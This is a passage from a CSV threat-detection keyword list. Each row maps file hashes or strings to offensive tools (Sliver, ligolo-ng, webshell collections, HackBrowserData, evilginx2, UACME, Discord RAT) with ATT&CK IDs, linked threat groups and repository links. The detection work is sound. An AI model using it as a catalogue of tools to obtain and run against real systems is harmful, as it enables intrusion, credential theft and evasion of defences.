"*dd7677e9132c0e2b813bf5a5fd4b34772d0804cf36b7266a2b9d0e64075019d0*",".{0,1000}dd7677e9132c0e2b813bf5a5fd4b34772d0804cf36b7266a2b9d0e64075019d0.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","40444"
"*dd789bbc91be5932fc0647ff4c88c3932ed9ccf2114265985c11481b6f79d848*",".{0,1000}dd789bbc91be5932fc0647ff4c88c3932ed9ccf2114265985c11481b6f79d848.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40446"
"*dd7c138a3ffae91a5a0ad5bc4478604951c7c2250c2ddadd975655b3fb9b988e*",".{0,1000}dd7c138a3ffae91a5a0ad5bc4478604951c7c2250c2ddadd975655b3fb9b988e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40447"
"*dd811322b3c78642e3ca888d95f9c6f7d7b56247979358731bcac341f29c6822*",".{0,1000}dd811322b3c78642e3ca888d95f9c6f7d7b56247979358731bcac341f29c6822.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40450"
"*dd820151677383a23da1dbdb9647a05b780146a0894502d6ac3a93c51e885cdb*",".{0,1000}dd820151677383a23da1dbdb9647a05b780146a0894502d6ac3a93c51e885cdb.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","40451"
"*dd86be9a1fb1198264e1a01247473be5e1498ef549a91b7c7143e5cfc25784e1*",".{0,1000}dd86be9a1fb1198264e1a01247473be5e1498ef549a91b7c7143e5cfc25784e1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","40452"
"*dd8e3e6e19c02c8c43cf136edcbc76d38de044ad572198088b086e04a04360b2*",".{0,1000}dd8e3e6e19c02c8c43cf136edcbc76d38de044ad572198088b086e04a04360b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40453"
"*dd8f333bb1fe5d749e7cad5a0629089ba540367cb018a1eeef5ff1f11f0df62d*",".{0,1000}dd8f333bb1fe5d749e7cad5a0629089ba540367cb018a1eeef5ff1f11f0df62d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40454"
"*dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922*",".{0,1000}dd9203bd24970aceaa30d3241a10fd259380144e57a279021b4c4378fa6c5922.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40456"
"*dd94382acb55e694ee38e1be7f5c0902be0e0d89*",".{0,1000}dd94382acb55e694ee38e1be7f5c0902be0e0d89.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","40457"
"*dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634*",".{0,1000}dd962b2de10f0a44beb1483ef05afce58151e471e9d0b79b7388f663292fd634.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","40458"
"*dd9740e337fc3b418598904549c3e53c95314168ab92ffe43a0383f2da79d898*",".{0,1000}dd9740e337fc3b418598904549c3e53c95314168ab92ffe43a0383f2da79d898.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","40459"
"*dd98cb29a275ed711f9a4299c45c0e8cc8d0a746bff0c95dee0dcb05a28496af*",".{0,1000}dd98cb29a275ed711f9a4299c45c0e8cc8d0a746bff0c95dee0dcb05a28496af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40460"
"*dd9f10b0e8c87705938e6f32325901f6ce20d2c05cb0220e33d040e06378bfa4*",".{0,1000}dd9f10b0e8c87705938e6f32325901f6ce20d2c05cb0220e33d040e06378bfa4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40461"
"*dda3dda6bca9be9945ccf838141b570f08b0763ff0eb74c1b17ccce22c9ceffb*",".{0,1000}dda3dda6bca9be9945ccf838141b570f08b0763ff0eb74c1b17ccce22c9ceffb.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","40463"
"*ddac74d6e7f7e4877a8b82599df53f2e6854536c483f505e390e260cfe5aa6ef*",".{0,1000}ddac74d6e7f7e4877a8b82599df53f2e6854536c483f505e390e260cfe5aa6ef.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","40466"
"*ddacbf2fc85fd85cdbe8016b19f2f783acb17dbaf6361e9827039885d382e8d2*",".{0,1000}ddacbf2fc85fd85cdbe8016b19f2f783acb17dbaf6361e9827039885d382e8d2.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#filehash","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","40467"
"*ddaecd7689624555334daa031c1a7e30c628cc6fbc5327c6c4efdf492444aeae*",".{0,1000}ddaecd7689624555334daa031c1a7e30c628cc6fbc5327c6c4efdf492444aeae.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40468"
"*ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f*",".{0,1000}ddb178cbaaab362c61d3d061b366625d205f208553ddf341b1c8fae466e5bd6f.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","40469"
"*ddbf3299675ffdd7e3475f8a4848f3ab6cdff8819348c75b9ac4d8fb76569a2c*",".{0,1000}ddbf3299675ffdd7e3475f8a4848f3ab6cdff8819348c75b9ac4d8fb76569a2c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40470"
"*ddcc3057b5c499e1e90d914d9da185d5860f0e9f44a3e5b8f5c9396eaa216ce0*",".{0,1000}ddcc3057b5c499e1e90d914d9da185d5860f0e9f44a3e5b8f5c9396eaa216ce0.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","40473"
"*ddcde0386174b43753d3f5f8e2e301ccfd8ef5a4dd60bb71c1005b6440072696*",".{0,1000}ddcde0386174b43753d3f5f8e2e301ccfd8ef5a4dd60bb71c1005b6440072696.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40474"
"*ddd36cf834fc7dca78f2d96e954e0949043c1c63aa268cfc18774e9875e63192*",".{0,1000}ddd36cf834fc7dca78f2d96e954e0949043c1c63aa268cfc18774e9875e63192.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","40476"
"*ddda511b0021b986442e74225967da027387842aeb9b88cd2ed51cfea1ff0758*",".{0,1000}ddda511b0021b986442e74225967da027387842aeb9b88cd2ed51cfea1ff0758.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40477"
"*ddde81ecf809882929faefd5887095a9d8671979f0c4d68579fa8b3a07674768*",".{0,1000}ddde81ecf809882929faefd5887095a9d8671979f0c4d68579fa8b3a07674768.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","#filehash","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","40478"
"*dde0f307acb5f8701be9bd6ecefa316952a96f3629e04fa8f519865752d78691*",".{0,1000}dde0f307acb5f8701be9bd6ecefa316952a96f3629e04fa8f519865752d78691.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","40479"
"*dde8e9815b11bced6601b6c0b11235c1c3e6d7ab3196634db85566699bf9e1e6*",".{0,1000}dde8e9815b11bced6601b6c0b11235c1c3e6d7ab3196634db85566699bf9e1e6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40480"
"*ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d*",".{0,1000}ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","#filehash","N/A","7","9","N/A","N/A","N/A","N/A","40481"
"*ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d*",".{0,1000}ddeeedc8ab9ab3b90c2e36340d4674fda3b458c0afd7514735b2857f26b14c6d.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","#filehash","N/A","7","9","N/A","N/A","N/A","N/A","40482"
"*ddf0d053a9ee7c4f7d1b1965a976ddfb3792c7703ff81fafb9a3758a45c86f9c*",".{0,1000}ddf0d053a9ee7c4f7d1b1965a976ddfb3792c7703ff81fafb9a3758a45c86f9c.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","40483"
"*ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5*",".{0,1000}ddf4573b4c5fdfd92657979d79b8d8c7658dbb36e9a794628438ff01d7cca1a5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40484"
"*ddf4c4af21b0ee3759fcf48f9adbd06f818c8f3058470e5861f760e629992400*",".{0,1000}ddf4c4af21b0ee3759fcf48f9adbd06f818c8f3058470e5861f760e629992400.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40485"
"*DDOSHTTPFLOOD*",".{0,1000}DDOSHTTPFLOOD.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","40489"
"*DDOSSYNFLOOD*",".{0,1000}DDOSSYNFLOOD.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","40490"
"*DDOSUDPFLOOD*",".{0,1000}DDOSUDPFLOOD.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","40491"
"*ddspoof*--enum-name-protection*",".{0,1000}ddspoof.{0,1000}\-\-enum\-name\-protection.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40492"
"*ddspoof.py -*",".{0,1000}ddspoof\.py\s\-.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40493"
"*DDSpoof\spoofer_config.py*",".{0,1000}DDSpoof\\spoofer_config\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40494"
"*DDSpoof-main*",".{0,1000}DDSpoof\-main.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40495"
"*de.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}de\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","40496"
"*de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a*",".{0,1000}de0565be5697d5543b8abb888a6d3d94d7cfb2538500b74ee38010f54f96a96a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40499"
"*de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03*",".{0,1000}de09af73cc55f3dfbf6bf40493075b3c93765aa0ad88e34b568eac727f6b0c03.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","40500"
"*de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e*",".{0,1000}de0be23b564e470725a91e72bf431667ab1d2d4e8cb318a1c18e66b3ba97340e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40501"
"*de25283c258cc462a919df98ff3033b6f433cf0ab4d92e95a650099839c45e63*",".{0,1000}de25283c258cc462a919df98ff3033b6f433cf0ab4d92e95a650099839c45e63.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","#filehash","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","40503"
"*de314bd66c919dbd7b5e6614583f44a6461a1663f880873bc6746eed3a149457*",".{0,1000}de314bd66c919dbd7b5e6614583f44a6461a1663f880873bc6746eed3a149457.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40504"
"*de3a20c75f66c663508436a2a3d049987158976535bb5e5eaa63823dbf6d7e3f*",".{0,1000}de3a20c75f66c663508436a2a3d049987158976535bb5e5eaa63823dbf6d7e3f.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","40506"
"*de3abde117d7eacbb638bc7d0151f929cf80a4bb5e5beb1e390839e96fc6722a*",".{0,1000}de3abde117d7eacbb638bc7d0151f929cf80a4bb5e5beb1e390839e96fc6722a.{0,1000}","offensive_tool_keyword","gmer","rootkit detector abused by attackers to disable security software","T1014 - T1562.001","TA0005","N/A","BlackSuit - Royal - PLAY - LockBit - Bassterlord* - Conti - 8BASE - TargetCompany - Hive - Avaddon","Defense Evasion","gmer.net","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","40507"
"*de49e60f2eb443316fa7585f6621fa83a9a3bb5b701649e05117ff4012379c89*",".{0,1000}de49e60f2eb443316fa7585f6621fa83a9a3bb5b701649e05117ff4012379c89.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40510"
"*de4efb508d6f89e6d638f4def3b014b2d6c5703baa5026e03990b7bccb0beab4*",".{0,1000}de4efb508d6f89e6d638f4def3b014b2d6c5703baa5026e03990b7bccb0beab4.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40512"
"*de53e80411d94b39ea18d9f98cbb1bd6dc07ac2ab732753dec649fef458f3aad*",".{0,1000}de53e80411d94b39ea18d9f98cbb1bd6dc07ac2ab732753dec649fef458f3aad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40513"
"*de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf*",".{0,1000}de569a85963dfe8966a51f5e5fdd9ecc9cbc30721fc2d624c4c29c6cf6d12adf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","40514"
